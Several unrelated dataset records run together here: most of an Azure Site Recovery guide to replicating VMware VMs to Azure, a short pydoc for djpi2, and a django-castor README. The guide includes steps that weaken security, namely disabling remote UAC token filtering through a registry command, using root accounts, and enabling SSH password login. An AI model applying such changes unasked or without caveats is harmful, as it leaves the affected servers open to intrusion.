Optional. Specifies settings for a custom proxy (either default proxy on the server that requires authentication, or custom proxy) ## Step 6: Set up credentials for the vCenter server > [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Discovery/player] > > The process server can automatically discover VMware VMs that are managed by a vCenter server. For automatic discovery Site Recovery needs an account and credentials that can access the vCenter server. This isn't relevant if you're replicating physical servers only. Do this as follows: 1. On the vCenter server create a role (**Azure_Site_Recovery**) at the vCenter level with the [required permissions](#vmware-permissions-for-vcenter-access). 2. Assign the **Azure_Site_Recovery** role to a vCenter user. > [!NOTE] > A vCenter user account that has the read-only role can run failover without shutting down protected source machines. If you want to shut down those machines you'll need the Azure_Site_Recovery role. Note that if you're only migrating VMs from VMware to Azure and don't need to failback then the read-only role is sufficient. > > 3. To add the account open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder. 4. in the **Manage Accounts** tab, click **Add Account**. ![Add account](./media/site-recovery-vmware-to-azure-classic/credentials1.png) 5. In **Account Details** add credentials that can be used to access the vCenter server. Note that it could take more than 15 minutes for the account name to appear in the portal. To update immediately, click Refresh on the **Configuration Servers** tab. ![Details](./media/site-recovery-vmware-to-azure-classic/credentials2.png) ## Step 7: Add vCenter servers and ESXi hosts If you're replicating VMware VMs you need to add a vCenter server (or ESXi host). 1. On the **Servers** > **Configuration Servers** tab, select the configuration server > **Add vCenter server**. ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter1.png) 2. Add the vCenter server or ESXi host details, the name of the account you specified to access the vCenter server in the previous step, and the process server that will be used to discover VMware VMs that are managed by the vCenter server. Note that the vCenter server or ESXi host should be located in the same network as the server on which the process server is installed. > [!NOTE] > If you're adding the vCenter server or ESXi host with an account that doesn't have administrator privileges on the vCenter or host server, then make sure the vCenter or ESXi accounts have these privileges enabled: Datacenter, Datastore, Folder, Jost, Network, Resource, Virtual machine, vSphere Distributed Switch. In addition the vCenter server needs the Storage views privilege. > > ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter2.png) 3. After discovery is complete the vCenter server will be listed in the **Configuration Servers** tab. ![vCenter](./media/site-recovery-vmware-to-azure-classic/add-vcenter3.png) ## Step 8: Create a protection group > [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Protection/player] > > Protection groups are logical groupings of virtual machines or physical servers that you want to protect using the same protection settings. You apply protection settings to a protection group, and those settings are applied to all virtual machines/physical machines that you add to the group. 1. Open **Protected Items** > **Protection Group** and click to add a protection group. ![Create protection group](./media/site-recovery-vmware-to-azure-classic/protection-groups1.png) 2. On the **Specify Protection Group Settings** page specify a name for the group and in **From** select the configuration server on which you want to create the group. **Target** is Azure. ![Protection group settings](./media/site-recovery-vmware-to-azure-classic/protection-groups2.png) 3. On the **Specify Replication Settings** page configure the replication settings that will be used for all the machines in the group. ![Protection group replication](./media/site-recovery-vmware-to-azure-classic/protection-groups3.png) * **Multi VM consistency**: If you turn this on it creates shared application-consistent recovery points across the machines in the protection group. This setting is most relevant when all of the machines in the protection group are running the same workload. All machines will be recovered to the same data point. This is available whether you're replicating VMware VMs, or Windows/Linux physical servers. * **RPO threshold**: Sets the RPO. Alerts will be generated when the continuous data protection replication exceeds the configured RPO threshold value. * **Recovery point retention**: Specifies the retention window. Protected machines can be recovered to any point within this window. * **Application-consistent snapshot frequency**: Specifies how frequently recovery points containing application-consistent snapshots will be created. When you click on the checkmark a protection group will be created with the name you specified. In addition a second protection group is created with the name <protection-group-name-Failback). This protection group is used if you fail back to the on-premises site after failover to Azure. You can monitor the protection groups as they're created on the **Protected Items** page. ## Step 9: Install the Mobility service The first step in enabling protection for virtual machines and physical servers is to install the Mobility service. You can do this in two ways: * Automatically push and install the service on each machine from the process server. Note that when you add machines to a protection group and they're already running an appropriate version of the Mobility service push installation won't occur. * Automatically install the service using your enterprise push method such as WSUS or System Center Configuration Manager. Make sure you've set up the management server before you do this. * Install manually on each machine you want to protect. ake sure you've set up the management server before you do this. ### Install the Mobility service with push installation When you add machines to a protection group the Mobility service is automatically pushed and installed on each machine by the process server. #### Prepare for automatic push on Windows machines Here's how to prepare Windows machines so that the Mobility service can be automatically installed by the process server. 1. Create an account that can be used by the process server to access the machine. The account should have administrator privileges (local or domain). Note that these credentials are only used for push installation of the Mobility service. > [!NOTE] > If you're not using a domain account you'll need to disable Remote User Access control on the local machine. To do this, in the register under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System add the DWORD entry LocalAccountTokenFilterPolicy with a value of 1 under . To add the registry entry from a CLI open command or using PowerShell enter **`REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1`**. > > 2. On the Windows Firewall of the machine you want to protect, select **Allow an app or feature through Firewall** and enable **File and Printer Sharing** and **Windows Management Instrumentation**. For machines that belong to a domain you can configure the firewall policy with a GPO. ![Firewall settings](./media/site-recovery-vmware-to-azure-classic/mobility1.png) 3. Add the account you created: * Open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder. * In the **Manage Accounts** tab, click **Add Account**. * Add the account you created. After adding the account you'll need to provide the credentials when you add a machine to a protection group. #### Prepare for automatic push on Linux servers 1. Make sure that the Linux machine you want to protect is supported as described in [On-premises prerequisites](#on-premises-prerequisites). Ensure there’s network connectivity between the machine you want to protect and the management server that runs the process server. 2. Create an account that can be used by the process server to access the machine. The account should be a root user on the source Linux server. Note that these credentials are only used for push installation of the Mobility service. * Open **cspsconfigtool**. It's available as a shortcut on the desktop and located in the [INSTALL LOCATION]\home\svsystems\bin folder. * In the **Manage Accounts** tab, click **Add Account**. * Add the account you created. After adding the account you'll need to provide the credentials when you add a machine to a protection group. 3. Check that the /etc/hosts file on the source Linux server contains entries that map the local hostname to IP addresses associated with all network adapters. 4. Install the latest openssh, openssh-server, openssl packages on the machine you want to protect. 5. Ensure SSH is enabled and running on port 22. 6. Enable SFTP subsystem and password authentication in the sshd_config file as follows: * Log in as root. * In the file /etc/ssh/sshd_config file, find the line that begins with PasswordAuthentication. * Uncomment the line and change the value from **no** to **yes**. * Find the line that begins with **Subsystem** and uncomment the line. ![Linux](./media/site-recovery-vmware-to-azure-classic/mobility2.png) ### Install the Mobility service manually The installers are available in C:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\pushinstallsvc\repository. | Source operating system | Mobility service installation file | | --- | --- | | Windows Server (64 bit only) |Microsoft-ASR_UA_9.*.0.0_Windows_* release.exe | | CentOS 6.4, 6.5, 6.6 (64 bit only) |Microsoft-ASR_UA_9.*.0.0_RHEL6-64_*release.tar.gz | | SUSE Linux Enterprise Server 11 SP3 (64 bit only) |Microsoft-ASR_UA_9.*.0.0_SLES11-SP3-64_*release.tar.gz | | Oracle Enterprise Linux 6.4, 6.5 (64 bit only) |Microsoft-ASR_UA_9.*.0.0_OL6-64_*release.tar.gz | #### Install manually on a Windows server 1. Download and run the relevant installer. 2. In **Before you begin **select **Mobility service**. ![Mobility service](./media/site-recovery-vmware-to-azure-classic/mobility3.png) 3. In **Configuration Server Details** specify the IP address of the management server and the passphrase that was generated when you installed the management server components. You can retrieve the passphrase by running: **<SiteRecoveryInstallationFolder>\home\sysystems\bin\genpassphrase.exe –n** on the management server. ![Mobility service](./media/site-recovery-vmware-to-azure-classic/mobility6.png) 4. In **Install Location** leave the default location and click **Next** to begin installation. 5. In **Installation Progress** monitor installation and restart the machine if prompted. You can also install from the command line: UnifiedAgent.exe [/Role <Agent/MasterTarget>] [/InstallLocation <Installation Directory>] [/CSIP <IP address of CS to be registered with>] [/PassphraseFilePath <Passphrase file path>] [/LogFilePath <Log File Path>] Where: * /Role: Mandatory. Specifies whether the Mobility service should be installed. * /InstallLocation: Mandatory. Specifies where to install the service. * /PassphraseFilePath: Mandatory. Specifies the configuration server passphrase. * /LogFilePath: Mandatory. Specifies log setup files location #### Uninstall Mobility service manually Mobility Service can be uninstalled using the Add Remove Program from Control Panel or using command line. The command to uninstall the Mobility Service using command line is MsiExec.exe /qn /x {275197FC-14FD-4560-A5EB-38217F80CBD1} #### Modify the IP address of the management server After running the wizard you can modify the IP address of the management server as follows: 1. Open the file hostconfig.exe (located on the desktop). 2. On the **Global** tab you can change the IP address of the management server. > [!NOTE] > You should only change the IP address of the management server. The port number for management server communications must be 443 and Use HTTPS should be left enabled. The passphrase shouldn't be modified. > > ![Management server IP address](./media/site-recovery-vmware-to-azure-classic/host-config.png) #### Install manually on a Linux server: 1. Copy the appropriate tar archive based on the table above to the Linux machine you want to protect. 2. Open a shell program and extract the zipped tar archive to a local path by running: `tar -xvzf Microsoft-ASR_UA_8.5.0.0*` 3. Create a passphrase.txt file in the local directory to which you extracted the contents of the tar archive. To do this copy the passphrase from C:\ProgramData\Microsoft Azure Site Recovery\private\connection.passphrase on the management server, and save it in passphrase.txt by running *`echo <passphrase> >passphrase.txt`* in shell. 4. Install the Mobility service by entering *`sudo ./install -t both -a host -R Agent -d /usr/local/ASR -i <IP address> -p <port> -s y -c https -P passphrase.txt`*. 5. Specify the internal IP address of the management server and make sure port 443 is selected. **You can also install from the command line**: 1. Copy the passphrase from C:\Program Files (x86)\InMage Systems\private\connection on the management server, and save it as "passphrase.txt" on the management server. Then run these commands. In our example the management server IP address is 104.40.75.37 and the HTTPS port should be 443: To install on a production server: ./install -t both -a host -R Agent -d /usr/local/ASR -i 104.40.75.37 -p 443 -s y -c https -P passphrase.txt To install on the master target server: ./install -t both -a host -R MasterTarget -d /usr/local/ASR -i 104.40.75.37 -p 443 -s y -c https -P passphrase.txt ## Step 10: Enable protection for a machine To enable protection you add virtual machines and physical servers to a protection group. Before you start,note the following if you're protecting VMware virtual machines: * VMware VMs are discovered every 15 minutes and it could take more than 15 minutes for them to appear in the Site Recovery portal after discovery. * Environment changes on the virtual machine (such as VMware tools installation) might also take more than 15 minutes to be updated in Site Recovery. * You can check the last discovered time for VMware VMs in the **Last Contact At** field for the vCenter server/ESXi host on the **Configuration Servers** tab. * If you have a protection group already created and add a vCenter Server or ESXi host after that, it might take more than 15 minutes for the Azure Site Recovery portal to refresh and for virtual machines to be listed in the **Add machines to a protection group** dialog. * If you would like to proceed immediately with adding machines to protection group without waiting for the scheduled discovery, highlight the configuration server (don’t click it) and click the **Refresh** button. In addition note that: * We recommend that you architect your protection groups so that they mirror your workloads. For example add machines running a specific application to the same group. * When you add machines to a protection group, the process server automatically pushes and installs the Mobility service if it isn't already installed. Note that you'll need to have the push mechanism prepare as described in the previous step. Add machines to a protection group: 1. Click **Protected Items** > **Protection Group** > **Machines** > Add Machines. \As a best practice 2. In **Select Virtual Machines** if you're protecting VMware virtual machines, select a vCenter server that's managing your virtual machines (or the EXSi host on which they're running), and then select the machines. ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection2.png) 3. In **Select Virtual Machines** if you're protecting physical servers, in the **Add Physical Machines** wizard provide the IP address and friendly name. Then select the operating system family. ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection1.png) 4. In **Specify Target Resources** select the storage account you're using for replication and select whether the settings should be used for all workloads. Note that premium storage accounts aren't currently supported. > [!NOTE] > 1.We do not support the move of Storage accounts created using the [new Azure portal](../storage/storage-create-storage-account.md) across resource groups. 2.[Migration of storage accounts](../resource-group-move-resources.md) across resource groups within the same subscription or across subscriptions is not supported for storage accounts used for deploying Site Recovery. > > ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection3.png) 5. In **Specify Accounts** select the account you [configured](#install-the-mobility-service-with-push-installation) to use for automatic installation of the Mobility service. ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection4.png) 6. Click the check mark to finish adding machines to the protection group and to start initial replication for each machine. > [!NOTE] > If push installation has been prepared the Mobility service is automatically installed on machines that don't have it as they're added to the protection group. After the service is installation a protection job starts and fails. After the failure you'll need to manually restart each machine that's had the Mobility service installed. After the restart the protection job begins again and initial replication occurs. > > You can monitor status on the **Jobs** page. ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection5.png) In addition, protection status can be monitored in **Protected Items** > <protection group name> > **Virtual Machines**. After initial replication completes, and data is synchronized, machine status changes to** Protected**. ![Enable protection](./media/site-recovery-vmware-to-azure-classic/enable-protection6.png) ## Step 11: Set protected machine properties 1. After a machine has a **Protected** status you can configure its failover properties. In the protection group details select the machine and open the **Configure** tab. 2. Site Recovery automatically suggests properties for the Azure VM and detects the on-premises network settings. ![Set virtual machine properties](./media/site-recovery-vmware-to-azure-classic/vm-properties1.png) 3. You can modify these settings: * **Azure VM name**: This is the name that will be given to the machine in Azure after failover. The name must comply with Azure requirements. * **Azure VM size**: The number of network adapters is dictated by the size you specify for the target virtual machine. [Read more](../virtual-machines/virtual-machines-linux-sizes.md#size-tables) about sizes and adapters. Note that: * When you modify the size for a virtual machine and save the settings, the number of network adapter will change when you open the **Configure** tab next time. The number of network adapters of target virtual machines is minimum of the number of network adapters on source virtual machine and maximum number of network adapters supported by the size of the virtual machine chosen. * If the number of network adapters on the source machine is less than or equal to the number of adapters allowed for the target machine size, then the target will have the same number of adapters as the source. * If the number of adapters for the source virtual machine exceeds the number allowed for the target size then the target size maximum will be used. * For example if a source machine has two network adapters and the target machine size supports four, the target machine will have two adapters. If the source machine has two adapters but the supported target size only supports one then the target machine will have only one adapter. * If the virtual machine has multiple network adapters all adapters should connected to the same Azure network. * **Azure network**: You must specify an Azure network that Azure VMs will be connected to after failover. If you don't specify one then the Azure VMs won't be connected to any network. In addition you'll need to specify an Azure network if you want to failback from Azure to the on-premises site. Failback requires a VPN connection between an Azure network and an on-premises network. * **Azure IP address/subnet**: For each network adapter you select the subnet to which the Azure VM should connect. Note that: * If the network adapter of the source machine is configured to use a static IP address then you can specify a static IP address for the Azure VM. If you don't provide a static IP address then any available IP address will be allocated. If the target IP address is specified but it's already in use by another VM in Azure then failover will fail. If the network adapter of the source machine is configured to use DHCP then you'll have DHCP as the setting for Azure. ## Step 12: Create a recovery plan and run a failover > [!VIDEO https://channel9.msdn.com/Blogs/Windows-Azure/Enhanced-VMware-to-Azure-Failover/player] > > You can run a failover for a single machine, or fail over multiple virtual machines that perform the same task or run the same workload. To fail over multiple machines at the same time you add them to a recovery plan. ### Create a recovery plan 1. On the **Recovery Plans** page click **Add Recovery Plan** and add a recovery plan. Specify details for the plan and select **Azure** as the target. ![Configure recovery plan](./media/site-recovery-vmware-to-azure-classic/recovery-plan1.png) 2. In **Select Virtual Machine** select a protection group and then select machines in the group to add to the recovery plan. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/recovery-plan2.png) You can customize the plan to create groups and sequence the order in which machines in the recovery plan are failed over. You can also add scripts and prompts for manual actions. Scripts can be created manually or by using by [Azure Automation Runbooks](site-recovery-runbook-automation.md). [Learn more](site-recovery-create-recovery-plans.md) about customizing recovery plans. ## Run a failover Before you run a failover note that: * Make sure that the management server is running and available - otherwise failover will fail. * If you run an unplanned failover note that: * If possible you should shut down primary machines before you run an unplanned failover. This ensures that you don't have both the source and replica machines running at the same time. If you're replicating VMware VMs then when you run an unplanned failover you can specify that Site Recovery should make best effort to shut down the source machines. Depending on the state of the primary site this might or might not work. If you're replicating physical servers Site Recovery doesn't offer this option. * When you perform an unplanned failover it stops data replication from primary machines so any data delta won't be transferred after an unplanned failover begins. * If you want to connect to the replica virtual machine in Azure after failover, enable Remote Desktop Connection on the source machine before you run the failover, and allow RDP connection through the firewall. You'll also need to allow RDP on the public endpoint of the Azure virtual machine after failover. Follow these [best practices](http://social.technet.microsoft.com/wiki/contents/articles/31666.troubleshooting-remote-desktop-connection-after-failover-using-asr.aspx) to ensure that RDP works after a failover. > [!NOTE] > To get the best performance when you do a failover to Azure, ensure that you have installed the Azure Agent in the protected machine. This helps in booting faster and also helps in diagnosis in case of issues. Linux agent can be found [here](https://github.com/Azure/WALinuxAgent) - and Windows agent can be found [here](http://go.microsoft.com/fwlink/?LinkID=394789) > > ### Run a test failover Run a test failover to simulate your failover and recovery processes in an isolated network that doesn't affect your production environment and regular replication continues as normal. Test failover initiates on the source and you can run it in a couple of ways: * **Don't specify an Azure network**: If you run a test failover without a network the test will simply check that virtual machines start and appear correctly in Azure. Virtual machines won’t be connected to a Azure network after failover. * **Specify an Azure network**: This type of failover checks that the entire replication environment comes up as expected and that Azure virtual machines are connected to the specified network. 1. In the **Recovery Plans** page select the plan and click **Test Failover**. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover1.png) 2. In **Confirm Test Failover** select **None** to indicate you don't want to use an Azure network for the test failover, or select the network to which the test VMs will be connected after failover. Click the check mark to start the failover. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover2.png) 3. Monitor failover progress on the **Jobs** tab. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/test-failover3.png) 4. After the failover completes you should also be able to see the replica Azure machine appear in Azure portal > **Virtual Machines**. If you want to initiate an RDP connection to the Azure VM you’ll need to open port 3389 on the VM endpoint. 5. After you’ve finished, when failover reaches the Complete testing phase, click Complete Test to finish. In Notes record and save any observations associated with the test failover. 6. Click **The test failover is complete** to automatically clean up the test environment. After this is done the test failover will show a **Complete** status. Any elements or VMs created automatically during the test failover are deleted. Note that if a test failover continues longer than two weeks it’s completed by force. ### Run an unplanned failover Unplanned failover is initiated from Azure and can be performed even if the primary site isn't available. 1. In the **Recovery Plans** page select the plan and click **Failover** > **Unplanned Failover**. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover1.png) 2. If you're replicating VMware virtual machines you can select to try and shut down on-premises VMs. This is best-effort and failover will continue whether the effort succeeds or not. If it doesn't succeed error details will appear on the **Jobs **tab > **Unplanned Failover Jobs**. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover2.png) > [!NOTE] > This option isn't available if you're replicating physical servers. You'll need to try and shut those down manually if possible. > > 3. In **Confirm Failover** verify the failover direction (to Azure) and select the recovery point you want to use for the failover. If you enabled multi-VM when you configured replication properties you can recover to the latest application or crash-consistent recovery point. You can also select **Custom recovery point** to recover to an earlier point in time. Click the check mark to start the failover. ![Add virtual machines](./media/site-recovery-vmware-to-azure-classic/unplanned-failover3.png) 4. Wait for the unplanned failover job to complete. You can monitor failover progress on the **Jobs** tab. Note that even if errors occur during unplanned failover the recovery plan runs until it's complete. You should also be able to see the replica Azure machine appear in Virtual Machines in the Azure portal. ### Connect to replicated Azure virtual machines after failover In order to connect to replicated virtual machines in Azure after failover here's what you'll need: 1. A Remote Desktop connection should be enabled on the primary machine. 2. The Windows Firewall on the primary machine to allow RDP. 3. After failover you'll need to add RDP to the public endpoint for Azure virtual machine. [Read more](http://social.technet.microsoft.com/wiki/contents/articles/31666.troubleshooting-remote-desktop-connection-after-failover-using-asr.aspx) about setting this up. ## Deploy additional process servers If you have to scale out your deployment beyond 200 source machines or your total daily churn rate exceeds 2 TB, you’ll need additional process servers to handle the traffic volume. To set up an additional process server check the requirements in [Additional process servers](#additional-process-servers) and then follow the instructions here to set up the process server. After setting up the server you can configure source machines to use it. ### Set up an additional process server You set up an additional process server as follows: * Run the unified wizard to configure a management server as a process server only. * If you want to manage data replication using only the new process server you'll need to migrate your protected machines to do this. ### Install the process server 1. On the Quick Start page download the unified installation file for the Site Recovery component installation. Run setup. 2. In **Before you begin** select **Add additional process servers to scale out deployment**. ![Add process server](./media/site-recovery-vmware-to-azure-classic/add-ps1.png) 3. Complete the wizard in the same way you did when you [set up](#step-5-install-the-management-server) the first management server. 4. In **Configuration Server Details** specify the IP address of the original management server on which you installed the configuration server, and the passphrase. On the original management server run **<SiteRecoveryInstallationFolder>\home\sysystems\bin\genpassphrase.exe –n** to obtain the passphrase. ![Add process server](./media/site-recovery-vmware-to-azure-classic/add-ps2.png) ### Migrate machines to use the new process server 1. Open **Configuration Servers** > **Server** > name of the original management server > **Server Details**. ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server1.png) 2. In the **Process Servers** list click **Change Process Server** next to the server you want to modify. ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server2.png) 3. In **Change Process Server** > **Target Process Server** select the new management server, and then select the virtual machines that the new process server will handle. Click the information icon to get information about the server. The average space that's needed to replicate each selected virtual machine to the new process server is displayed to help you make load decisions. Click the check mark to start replicating to the new process server. ![Update process server](./media/site-recovery-vmware-to-azure-classic/update-process-server3.png) ## VMware permissions for vCenter access The process server can automatically discover VMs on a vCenter server. To perform automatic discovery you'll need to define a role (Azure_Site_Recovery) at the vCenter level to allow Site Recovery to access the vCenter server. Note that if you only need to migrate VMware machines to Azure and don't need to failback from Azure, you can define a read-only role that's sufficient. You set up the permissions as described in [Step 6: Set up credentials for the vCenter server](#step-6-set-up-credentials-for-the-vcenter-server) The role permissions are summarized in the following table. | **Role** | **Details** | **Permissions** | | --- | --- | --- | | Azure_Site_Recovery role |VMware VM discovery |Assign these privileges for the v-Center server:<br/><br/>Datastore->Allocate space, Browse datastore, Low level file operations., Remove file, Update virtual machine files<br/><br/>Network-> Network assign<br/><br/>Resource -> Assign virtual machine to resource pool, Migrate powered off virtual machine, Migrate powered on virtual machine<br/><br/>Tasks -> Create task, update task<br/><br/>Virtual machine -> Configuration<br/><br/>Virtual machine -> Interact -> Answer question , Device connection., Configure CD media, Configure floppy media, Power off, Power on, VMware tools install<br/><br/>Virtual machine -> Inventory -> Create, Register, Unregister<br/><br/>Virtual machine -> Provisioning -> Allow virtual machine download, Allow virtual machine files upload<br/><br/>Virtual machine -> Snapshots -> Remove snapshots | | vCenter user role |VMware VM discovery/Failover without shutdown of source VM |Assign these privileges for the v-Center server:<br/><br/>Data Center object –> Propagate to Child Object, role=Read-only <br/><br/>The user is assigned at datacenter level and thus has access to all the objects in the datacenter. If you want to restrict the access, assign the **No access** role with the **Propagate to child** object to the child objects (ESX hosts, datastores, VMs and networks). | | vCenter user role |Failover and failback |Assign these privileges for the v-Center server:<br/><br/>Datacenter object – Propagate to child object, role=Azure_Site_Recovery<br/><br/>The user is assigned at datacenter level and thus has access to all the objects in the datacenter. If you want to restrict the access, assign the **No access **role with the **Propagate to child object** to the child object (ESX hosts, datastores, VMs and networks). | ## Third-party software notices and information Do Not Translate or Localize The software and firmware running in the Microsoft product or service is based on or incorporates material from the projects listed below (collectively, “Third Party Code”). Microsoft is the not original author of the Third Party Code. The original copyright notice and license, under which Microsoft received such Third Party Code, are set forth below. The information in Section A is regarding Third Party Code components from the projects listed below. Such licenses and information are provided for informational purposes only. This Third Party Code is being relicensed to you by Microsoft under Microsoft's software licensing terms for the Microsoft product or service. The information in Section B is regarding Third Party Code components that are being made available to you by Microsoft under the original licensing terms. The complete file may be found on the [Microsoft Download Center](http://go.microsoft.com/fwlink/?LinkId=529428). Microsoft reserves all rights not expressly granted herein, whether by implication, estoppel or otherwise. ## Next steps [Learn more about failback](site-recovery-failback-azure-to-vmware-classic.md) to bring your failed over machines running in Azure back to your on-premises environment.
94.833333
4,505
0.777006
eng_Latn
0.992563
6f57a0ed396ed32e190f1d5198ac45b686ea6afc
569
md
Markdown
src/pydoc/pydjpi2.md
mjc87/SHTOOLS
8d83c42d1313d5624c4db8c2e57300c5d819834e
[ "BSD-3-Clause" ]
251
2015-01-27T12:58:28.000Z
2022-03-29T17:19:36.000Z
src/pydoc/pydjpi2.md
mjc87/SHTOOLS
8d83c42d1313d5624c4db8c2e57300c5d819834e
[ "BSD-3-Clause" ]
193
2015-03-11T06:21:08.000Z
2022-03-31T14:05:45.000Z
src/pydoc/pydjpi2.md
mjc87/SHTOOLS
8d83c42d1313d5624c4db8c2e57300c5d819834e
[ "BSD-3-Clause" ]
100
2015-04-03T07:11:05.000Z
2022-03-23T23:46:33.000Z
# djpi2() Compute the rotation matrix d(pi/2) used in rotating data expressed in spherical harmonics. # Usage dj = djpi2 (lmax) # Returns dj : float, dimension (lmax+1, lmax+1, lmax+1) : The rotation matrix dj(pi/2). # Parameters lmax : integer : The maximum spherical harmonic degree of the spherical harmonic rotation. # Description djpi2 will calculate the rotation matrix `d_{mM}^j (pi/2)` that is used in rotating spherical harmonics in the routines SHRotateRealCoef and SHRotateCoef. This routine is based on code originally written by Guy Masters.
23.708333
154
0.753954
eng_Latn
0.987184
6f57e8207a48d26e1f4d2ad487e549a9aaf422fe
5,222
md
Markdown
README.md
panaceya/django-castor
fd9398b8385670c615d4d3ef3acea83b95a6131d
[ "Unlicense" ]
8
2015-02-04T21:57:51.000Z
2017-09-07T01:50:06.000Z
README.md
panaceya/django-castor
fd9398b8385670c615d4d3ef3acea83b95a6131d
[ "Unlicense" ]
1
2015-10-08T14:46:58.000Z
2015-10-09T13:57:50.000Z
README.md
panaceya/django-castor
fd9398b8385670c615d4d3ef3acea83b95a6131d
[ "Unlicense" ]
4
2015-10-08T12:46:38.000Z
2021-06-03T13:47:27.000Z
# `django-castor` `django-castor` is a re-usable app for Django which provides a **content-addressable storage backend**. The main class, `djcastor.storage.CAStorage`, is a type of `FileSystemStorage` which saves files under their SHA-1 digest. * No matter how many times the same file is uploaded, it will only ever be stored once, thus eliminating redundancy. * Filenames are pseudorandom and made up only of hexadecimal characters, so you don’t have to worry about filename collisions or sanitization. * `django-castor` shards files in the uploads directory based on their digests; this prevents filesystem issues when too many files are in a single directory. For more information on the CAS concept, see the [wikipedia page][]. [wikipedia page]: http://en.wikipedia.org/wiki/Content-addressable_storage ## Installation pip install django-castor # or easy_install django-castor ## Usage Basic usage is as follows: from django.db import models from djcastor import CAStorage class MyModel(models.Model): ... uploaded_file = models.FileField(storage=CAStorage(), upload_to='uploads') At the moment, Django requires a non-empty value for the `upload_to` parameter. Note that `CAStorage` will **not** use this value; if you need to customize the destination for uploaded files, use the `location` parameter (see below). For extended usage, there are several options you can pass to the `CAStorage` constructor. The first two are inherited from the built-in `FileSystemStorage`: * `location`: The absolute path to the directory that will hold uploaded files. If omitted, this will be set to the value of the `MEDIA_ROOT` setting. * `base_url`: The URL that serves the files stored at this location. If omitted, this will be set to the value of the `MEDIA_URL` setting. `CAStorage` also adds two custom options: * `keep_extension` (default `True`): Preserve the extension on uploaded files. This allows the webserver to guess their `Content-Type`. * `sharding` (default `(2, 2)`): The width and depth to use when sharding digests, expressed as a two-tuple. The following examples show how these parameters affect the sharding: >>> digest = '1f09d30c707d53f3d16c530dd73d70a6ce7596a9' >>> print shard(digest, width=2, depth=2) 1f/09/1f09d30c707d53f3d16c530dd73d70a6ce7596a9 >>> print shard(digest, width=2, depth=3) 1f/09/d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9 >>> print shard(digest, width=3, depth=2) 1f0/9d3/1f09d30c707d53f3d16c530dd73d70a6ce7596a9 ## Caveats The first small caveat is that content-addressable storage is not suited to rapidly-changing content. If your website modifies the contents of file fields on a regular basis, it might be a better idea to use a UUID-based storage backend for those fields. The second, more important caveat with this approach is that if the parent model of a file is deleted, the file will remain on disk. Because individual files may be referred to by more than one model, and `django-castor` has no awareness of these references, it leaves file deletion up to the developer. For the most part, you can get away without deleting uploads. In fact, content-addressable storage is often used for long-term archival systems, where files are immutable and must be kept for future auditing (usually for compliance with government regulations). If disk space is at a premium and you need to delete uploads, there are two approaches you might want to take: * Garbage collection: write a script that walks through the list of uploaded files and checks references to each one. If no references are found, delete the file. * Reference counting: denormalize the `FileField` into a separate model, and keep a count of all the models pointing to it. Once this count reaches zero, delete the file from the filesystem. ## (Un)license This is free and unencumbered software released into the public domain. Anyone is free to copy, modify, publish, use, compile, sell, or distribute this software, either in source code form or as a compiled binary, for any purpose, commercial or non-commercial, and by any means. In jurisdictions that recognize copyright laws, the author or authors of this software dedicate any and all copyright interest in the software to the public domain. We make this dedication for the benefit of the public at large and to the detriment of our heirs and successors. We intend this dedication to be an overt act of relinquishment in perpetuity of all present and future rights to this software under copyright law. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. For more information, please refer to <http://unlicense.org/>
40.796875
80
0.755841
eng_Latn
0.993121
6f588734494e598f53d652a0752df491740d10ee
241
md
Markdown
criteria/geode/README.md
dwragge/immutables
99bdb6b007b1f1d90ebfbdf545f6fb8505643b10
[ "Apache-2.0" ]
3,263
2015-01-06T09:54:18.000Z
2022-03-31T19:53:54.000Z
criteria/geode/README.md
dwragge/immutables
99bdb6b007b1f1d90ebfbdf545f6fb8505643b10
[ "Apache-2.0" ]
1,194
2015-01-01T20:05:20.000Z
2022-03-30T16:21:47.000Z
criteria/geode/README.md
dwragge/immutables
99bdb6b007b1f1d90ebfbdf545f6fb8505643b10
[ "Apache-2.0" ]
308
2015-04-07T22:13:03.000Z
2022-03-17T03:52:49.000Z
Adapter for [Apache Geode](https://geode.apache.org/). It will typically generate [OQL](https://geode.apache.org/docs/guide/19/developing/querying_basics/query_basics.html) to query the cache. Geode adapter is currently work in progress.
34.428571
118
0.784232
eng_Latn
0.828853
6f58fb85087e517d1345532982319d743865619a
4,934
md
Markdown
articles/bastion/diagnostic-logs.md
maiemy/azure-docs.it-it
b3649d817c2ec64a3738b5f05f18f85557d0d9b6
[ "CC-BY-4.0", "MIT" ]
null
null
null
